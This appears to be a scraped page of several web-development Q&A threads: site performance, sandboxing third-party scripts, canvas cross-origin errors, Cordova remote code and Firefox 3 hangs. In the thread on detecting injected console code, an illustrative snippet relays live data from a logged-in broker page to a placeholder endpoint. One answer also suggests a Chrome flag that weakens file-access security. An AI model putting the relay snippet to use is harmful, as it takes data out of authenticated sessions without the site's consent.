The website testmysite claims that the website I'm working on is very slow, namely 9.8 seconds on 4G, which is ridiculous.
My webapp requests geolocation first, but the request is denied immediately, so this is not where the slowness comes from.
The site is server-rendered, and sends scripts to the client to optimise.
The bundle analyzer output seems very dubious: it claims that my total bundle size is 750 kB, but I strongly doubt that this is the case.
Even if it turns out that testmysite is not a reliable source, I'd like to know why it says that my website is so slow, and what I can actually do to improve it.
My vendor node modules are chunk split, because I want the browser to cache them individually.
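For reference, the splitting is set up roughly like this (a simplified sketch of a webpack-style splitChunks config; the option names here are illustrative rather than my literal build file):

// webpack.config.js (excerpt) - one cacheable chunk per node_modules package
module.exports = {
    optimization: {
        splitChunks: {
            chunks: 'all',
            cacheGroups: {
                vendor: {
                    test: /[\\/]node_modules[\\/]/,
                    name(module) {
                        // derive a stable chunk name from the package folder so each one caches separately
                        const pkg = module.context.match(/[\\/]node_modules[\\/](.*?)([\\/]|$)/)[1];
                        return 'npm.' + pkg.replace('@', '');
                    },
                },
            },
        },
    },
};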
My website is deployed here: https://zwoop-website-v001.herokuapp.com
Note that loading may take some time because I use the free service and the server falls asleep often.
Edit: my performance tab shows the following in Chrome:
I have really zero idea why that website says that my site is slow...
But if the measurement is used by search engines, then I do care.
Answer:
I just voted to re-open this question, as @slebetman has helped me troubleshoot some issues and I'd like to formulate an answer.
First thing to note is that the free Heroku server I run in production is located in Europe (this was an option you could choose), and it is unclear where the server from testmysite is located. @slebetman was located in East Asia when running his test.
@slebetman mentioned that the network tab showed him a very slow load time of about 2 seconds for fonts (woff2). This didn't occur for me, but as it turns out, these are Font Awesome icons that are loaded from a CDN.
So while it is logical to think about performance in terms of script loading, interpretation and rendering, there may additionally be a latency issue related to third-party resources downloaded from another server. Even when your own website is fast, you don't necessarily know whether some module you imported requests additional resources.
Either of these things can be tracked through the Performance or Network tab of Google Chrome. An additional tip is to mimic a slow network (although I don't think this would surface all problems that may occur on the network in terms of redirects, DNS resolution etc., as @slebetman mentions could be the case as well).
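As a concrete illustration of that tip, the Resource Timing API lists every downloaded resource with its duration, which makes slow third-party requests (like the CDN fonts above) easy to spot from the console (a minimal sketch):

// Log every resource that took longer than 500 ms, slowest first
var slow = performance.getEntriesByType('resource')
    .filter(function (entry) { return entry.duration > 500; })
    .sort(function (a, b) { return b.duration - a.duration; })
    .map(function (entry) { return { url: entry.name, ms: Math.round(entry.duration) }; });
console.table(slow);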
Related
Short version:
Is it possible to detect that someone added code to run inside a page from the browser inspector?
Long version:
Stock broker companies give their users the real-time value of stocks; other free tools give you a delayed version of those values, for example 15-minute-old information.
There are other financial companies that offer a real-time API giving you access to the stock market, at a cost.
What some people do is keep their browsers open on the broker site and inject some JS code to observe the changes and post them elsewhere using XHR or web sockets. Not only network calls but also the Notification API and the draft Serial API can be exploited to get data out of the site.
This usually can't be done automatically, because logins are secured with captchas or other methods. But once the user is logged in and the code is injected, the hack will work until the tab is closed.
Usually this is not done by injecting script tags that point to external files, but by pasting the whole code into the inspector and running it.
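To make that concrete, the pasted snippet is typically something along these lines (a sketch only; the selector and endpoint are made up for illustration):

// Watch a price element on the already-logged-in page and relay changes elsewhere
var target = document.querySelector('.stock-price'); // hypothetical selector
var observer = new MutationObserver(function () {
    fetch('https://example.com/collect', { // hypothetical endpoint
        method: 'POST',
        body: JSON.stringify({ price: target.textContent, at: Date.now() })
    });
});
observer.observe(target, { childList: true, characterData: true, subtree: true });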
Now back to the question: can a site know that rogue code is running on its pages?
I thought of some methods, like keeping a hash of every variable used, and if anything new is created the page reloads or warns the user. But I'm not sure this is possible in today's JS; I guess document.all could help.
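A rough sketch of that idea (snapshotting the page's own globals and checking periodically for newcomers; note it only catches injected code that creates new global variables, so it is easy to evade):

// Take a baseline of global property names once the page's own scripts have finished loading
var knownGlobals = new Set(Object.getOwnPropertyNames(window));

setInterval(function () {
    var added = Object.getOwnPropertyNames(window).filter(function (name) {
        return !knownGlobals.has(name);
    });
    if (added.length > 0) {
        console.warn('Unexpected globals appeared:', added);
        // at this point the site could warn the user or reload the page
    }
}, 5000);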
So yes, kinda, and also no, kinda... there isn't a great cross-browser solution to this, as the browsers' implementations of the debug tools are all slightly different. This solution is probably the best I've found so far.
First some backstory:
We have a website that includes a Google Map in the usual way:
<script src="https://maps.googleapis.com/maps/api/js?v=..."></script>
Then there is some of our JavaScript code that initializes the map. Now suddenly yesterday pages started to load but then froze up entirely. In Chrome this resulted in having to force quit and restart. Firefox was smarter and allowed the user to stop script execution.
Now after some debugging, I found out that a previous developer had included the experimental version of the Google Maps API:
https://maps.googleapis.com/maps/api/js?v=3.exp
So it's likely that something has changed on Google's servers (which is completely understandable). This has uncovered a bug on our end, and both in combination caused the script to hang and freeze up the website and the browser.
Now ok, bug is found and fixed, no big harm done.
And now the actual question:
Is it possible to somehow sandbox these external script references so that they cannot crash my main site? I am loading a decent number of external JavaScript files (tracking, analytics, maps, social) from their own servers.
However, such code could change at any time and could have bugs that freeze my site. How can I protect my site? Is there a way to define a maximum allowable execution time?
I'm open to all kinds of suggestions.
It actually doesn't matter where the scripts come from - whether an external source or your own server. Either way, they run in the client's browser, and that makes it quite difficult to achieve your desired sandbox behavior.
You can get a sandbox inside your DOM by using iframes with the sandbox attribute. This way the content of the iframe is independent from the DOM of your actual website, and you can include scripts independently as well. But this is beneficial mainly for security; I am not sure how it would behave regarding overall stability when one script has a bug like an endless loop or similar. But imho this is worth a try.
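A rough sketch of what I mean, creating the sandboxed frame from script (the script URL is a placeholder; and as said, I am not certain every browser would keep an endless loop in the frame from affecting the page):

// Load the third-party script inside a sandboxed iframe instead of the main document
var frame = document.createElement('iframe');
frame.setAttribute('sandbox', 'allow-scripts'); // scripts may run, but get no access to the parent DOM
frame.srcdoc = '<script src="https://third-party.example.com/widget.js"><\/script>'; // placeholder URL
document.body.appendChild(frame);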
For further explanation see: https://www.html5rocks.com/en/tutorials/security/sandboxed-iframes/
This question has been asked a lot, but I just don't understand why this is happening to me.
Basically, I have a canvas, and an image, and when I try to do this:
var canvas = document.getElementById('somecanvas');
var ctx = canvas.getContext('2d');
var data;

var someimage = document.createElement('img');
someimage.setAttribute('src', 'img/someimage.png');
someimage.onload = function () {
    // draw the image onto the canvas, then read the pixels back
    ctx.drawImage(someimage, 0, 0, canvas.width, canvas.height);
    data = ctx.getImageData(0, 0, canvas.width, canvas.height);
};
I get the unsightly:
"Uncaught DOMException: Failed to execute 'getImageData' on 'CanvasRenderingContext2D': The canvas has been tainted by cross-origin data.
at HTMLImageElement.someimage.onload"
I should mention that I'm fairly new to programming, and even more so to JavaScript. Should this be happening when I'm running it from file://?
I haven't found anyone having the exact same problem as me, and the explanations people got for the other questions had to do with the server the images were hosted on. But in this case it isn't hosted on a server, so I'm confused as to how it all works. Or rather, doesn't work.
For security reasons, many browsers will complain if you try to do certain things (canvas image drawing among them), if you use a file:// URL.
You really should serve both the page and the images from a local HTTP server in order to avoid those restrictions.
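If you don't want to install a full web server, even a tiny Node script will do for local debugging (a minimal sketch: it serves the current directory on http://localhost:8080, with no MIME types and no security, so use it for debugging only):

// serve.js - run with "node serve.js" from the folder containing your page and images
const http = require('http');
const fs = require('fs');
const path = require('path');

http.createServer(function (req, res) {
    const file = path.join(process.cwd(), req.url === '/' ? 'index.html' : req.url);
    fs.readFile(file, function (err, data) {
        if (err) {
            res.writeHead(404);
            res.end('Not found');
            return;
        }
        // a real server would also set a Content-Type header per file extension
        res.end(data);
    });
}).listen(8080, function () {
    console.log('Serving on http://localhost:8080');
});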
Ah, you've hit the CORS restriction, and I'm guessing here that you're encountering this in Google Chrome, which is notorious for being the most aggressive implementor of this. I've seen this a LOT.
CORS is a protocol intended to prevent cross-origin content from being inserted into a web page. It not only affects script files (as you might expect, because you don't want just anyone to be able to inject malicious scripts into your web page), but also resources such as images and fonts.
The reason it affects images is that malicious individuals discovered they could use the HTML5 canvas object to copy the contents of your web page to a PNG file, and hoover personal data from it at will. You can imagine what would happen if that occurred while you were doing your Internet banking!
But, and this is the annoying part you're encountering, stopping such malicious activity also impinges on legitimate uses of cross-origin resources (e.g., keeping all your images in a separate repository).
So how do you get around this?
On Firefox, you shouldn't have a problem. Firefox applies some intelligence to the matter, and recognises that images coming from the same file:// specification as your web page are not actually cross-origin. It lets these through, so long as they're in the same directory on your hard drive as your web page.
Chrome, on the other hand, is much less permissive. It treats all such accesses as cross-origin, and implements security shutdowns the moment you try using getImageData() and putImageData() on a canvas.
There is a workaround, if you don't want to go to the trouble of installing and configuring your own local web server, but still want to use Chrome and its nice, friendly debugger. You have to create a shortcut that points to your Chrome executable and runs it when you double-click it, but which starts Chrome with a special command-line flag:
--allow-file-access-from-files
Save this shortcut, labelling it something like "Chrome Debug Version" to remind you ONLY to use this for debugging your own code (you should never access the Internet proper with weakened security!), and you should be able to debug your code without issues from this point on.
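For example, on Windows the shortcut's Target field would look something like this (the install path varies from machine to machine, so treat it as illustrative):

"C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-file-access-from-files

Note that the flag only takes effect on a fresh launch, so close any running Chrome windows before starting the debug shortcut.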
But, if you're going to be doing a lot of debugging of this sort, the better long-term solution is to install a web server and configure it to serve up code from your desired directories every time you use the "localhost" URL. This is, I know, tedious and time-consuming, and distracts from your desire to get coding, but once it's done, it's done and dusted, and solves your woes permanently.
If you really want to put your programming skills to the test, you could even write your own web server to do the job, using something like the node.js server side framework, but if you're new to JavaScript, that's a task you're better leaving until you have a lot more experience! But once your skills reach that point, doing that is a nice educational exercise that will also solve some of your other woes, once you've worked out how a web server works.
If you run with an established web server, you then, of course, have the fun of deciding which one involves the least headaches. Apache is powerful, but big. Hiawatha is both lightweight and secure, and would be my first choice if it wasn't for the fact that a 64-bit version is still not available (sigh), because the 32-bit version that ran on my old XP box was a joy to use. Nginx I know little about, but some people like it. Caveat emptor and all that.
Hi all.
My team has been toying with the idea of developing an iOS app using Cordova, and recently, we've been looking into offloading as much of the main JavaScript as possible to our server, in an attempt to speed up fixing critical bugs.
The idea would be to have:
the native app containing all HTML, CSS, plugins and Cordova files
the main JavaScript added to the pages as external scripts from a server
a device-ready function for each page that will set up and start the main JavaScript once it's available (see the sketch after this list)
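Roughly what that per-page bootstrap could look like (a hedged sketch; the URL and the startPage() entry point are placeholders, not our actual code):

// Wait for Cordova to report the device is ready, then pull the page's main JS from the server
document.addEventListener('deviceready', function () {
    var script = document.createElement('script');
    script.src = 'https://app.example.com/js/page1-main.js'; // placeholder URL
    script.onload = function () {
        startPage(); // illustrative entry point defined by the downloaded script
    };
    script.onerror = function () {
        document.getElementById('status').textContent = 'Could not reach the server.';
    };
    document.body.appendChild(script);
}, false);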
I have seen comments that Apple could be trusting of code that runs in a webview, but it does seem like projects like this could be a security issue.
I am aware of other questions and the like that touch on this, but I feel that the context was always different.
Thanks!
A year ago Apple changed the iOS Developer Program Agreement to allow downloading of code; see Section 3.3.2:
3.3.2 An Application may not download or install executable code. Interpreted code may only be used in an Application if all scripts, code and interpreters are packaged in the Application and not downloaded. The only exception to the foregoing is scripts and code downloaded and run by Apple's built-in WebKit framework, provided that such scripts and code do not change the primary purpose of the Application by providing features or functionality that are inconsistent with the intended and advertised purpose of the Application as submitted to the App Store.
So, as you are using Cordova, and Cordova uses the WebKit framework, you won't be rejected as long as you don't change the main purpose of the Application.
The answer is: it depends on how you use the system. The technical ding that hits most people is Apple iTunes Guideline 2.12:
Apps that are not very useful, unique, are simply web sites bundled as Apps, or do not provide any lasting entertainment value may be rejected
It seems clear to me, but as a volunteer on the "official" phonegap forum, I'm often very blunt with people on this point. Nothing is worse than months of work for nothing.
On the JavaScript idea: loading the JavaScript file from the web is not good practice. If your app ever loses the network, your app will be non-responsive. One app that I can name, that was growing by leaps and bounds and has this problem, is Words with Friends. I play it and I can see the stall every time.
Make sure your App is always responsive, and if it is not, give a short, reasonable explanation like "Oops, we can't find the Internet."
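A minimal sketch of the kind of guard I mean (the names are illustrative):

// Fail fast with a human-readable message instead of silently stalling
function loadRemoteScript(url, onReady) {
    if (!navigator.onLine) {
        alert("Oops, we can't find the Internet.");
        return;
    }
    var script = document.createElement('script');
    script.src = url;
    script.onload = onReady;
    script.onerror = function () {
        alert("Oops, we can't find the Internet.");
    };
    document.body.appendChild(script);
}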
I have seen comments that Apple could be trusting of code that runs in a webview, but it does seem like projects like this could be a security issue.
Yes, Apple trusts code that runs in a webview, because it is not a browser. However, that does not make it secure. We have plenty of security issues and bugs. A recent security issue allows rogue code to insert weblinks into the webview, and thereby allows the App to be used as an attack vector. Another recent security issue will launch rogue code from an mp3 file! And this bug goes back to Android 2.0.
The cure is worse than the problem. It's a huge whitelist protocol that is confusing because of the bad documentation. Luckily, I should have a blog post up in a few days; other people are working on blog posts too. My raw notes are online, or read the current issues, especially #10.
I am aware of other questions and the like that touch on this, but I feel that the context was always different.
Feel free to read my notes. The one I give to people all the time is:
Top Mistakes by Developers new to Cordova/Phonegap
But the root has more notes
Best of Luck.
Recently I have been having issues with Firefox 3 on Ubuntu Hardy Heron.
I will click on a link and it will hang for a while. I don't know if it's a bug in Firefox 3 or a page running too much client-side JavaScript, but I would like to try and debug it a bit.
So, my question is "is there a way to have some kind of process explorer, or task manager sort of thing for Firefox 3?"
I would like to be able to see what tabs are using what percent of my processor via the JavaScript on that page (or anything in the page that is causing CPU/memory usage).
Does anybody know of a plugin that does this, or something similar? Has anyone else done this kind of inspection another way?
I know about Firebug, but I can't imagine how I would use it to pinpoint which tab is using a lot of resources.
Any suggestions or insights?
It's probably the awesome firefox3 fsync "bug", which is a giant pile of fail.
In summary
Firefox3 saves its bookmarks and history in an SQLite database
Every time you load a page it writes to this database several times
SQLite cares deeply that you don't lose your bookmarks, so each time it writes, it instructs the kernel to flush its database file to disk and ensure that it's fully written
Many variants of Linux, when told to flush like that, flush EVERY FILE. This may take up to a minute or more if you have background tasks doing any kind of disk-intensive work.
The kernel makes firefox wait while this flush happens, which locks up the UI.
So, my question is, is there a way to have some kind of process explorer, or task manager sort of thing for Firefox 3?
Because of the way Firefox is built, this is not possible at the moment. But the new Internet Explorer 8 Beta 2 and the just-announced Google Chrome browser are heading in that direction, so I suppose Firefox will head there too.
Here is a post (Google Chrome Process Manager) by John Resig, of Mozilla and jQuery fame, on the subject.
There's a thorough discussion of this that explains all of the fsync related problems that affected pre-3.0 versions of FF. In general, I have not seen the behaviour since then either, and really it shouldn't be a problem at all if your system isn't also doing IO intensive tasks. Firebug/Venkman make for nice debuggers, but they would be painful for figuring out these kinds of problems for someone else's code, IMO.
I also wish that there was an easy way to look at CPU utilization in Firefox by tab, though, as I often find myself with FF eating 100% CPU, but no clue which part is causing the problem.
XUL Profiler is an awesome extension that can point out extensions and client-side JS gone bananas CPU-wise. It does not work on a per-tab basis, but per script (or so). You can normally relate those .js scripts to your tabs or extensions by hand.
It is also worth mentioning that Google Chrome has built-in a really good task manager that gives memory and CPU usage per tab, extension and plugin.
[XUL Profiler] is a Javascript profiler. It shows elapsed time in each method as a graph, as well as browser canvas zones redraws to help track down consuming CPU chunks of code.
Traces all JS calls and paint events in XUL and pages context. Builds an animation showing dynamically the canvas zones being redrawn.
As of FF 3.6.10 it is not up to date in that it is not marked as compatible anymore. But it still works and you can override the incompatibility with the equally awesome MR Tech Toolkit extension.
There's no "process explorer" kind of tool for Firefox; but there's https://developer.mozilla.org/en-US/docs/Archive/Mozilla/Venkman with profiling mode, which you could use to see the time spent by chrome (meaning non-content, that is not web-page) scripts.
From what I've read about it, DTrace might also be useful for this sort of thing, but it requires creating a custom build and possibly adding additional probes to the source. I haven't played with it myself yet.